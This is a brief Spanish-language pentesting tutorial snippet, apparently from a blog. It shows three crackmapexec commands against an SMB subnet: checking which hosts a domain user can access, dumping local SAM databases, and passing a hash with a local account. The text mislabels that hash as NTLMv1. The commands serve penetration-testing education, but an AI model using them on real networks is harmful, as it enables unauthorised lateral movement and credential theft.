Utilizamos crackmapexec para encontrar que equipos tenemos acceso en una red con un usuario de dominio y password.
[simterm]$ crackmapexec smb 192.168.0.0/24 -u user -p password -d domain.local [/simterm]
Podemos tratar de extraer la base SAM local de los dispositivos conectados a la red.
[simterm]$ crackmapexec smb 192.168.0.0/24 -u user -p password -d domain.local –sam [/simterm]
Podemos también utilizar el hash NTLMv1 y en este caso usaremos una cuenta local con el siguiente comando.
[simterm]$ crackmapexec smb 192.168.0.0/24 -u user -H hash –local-auth [/simterm]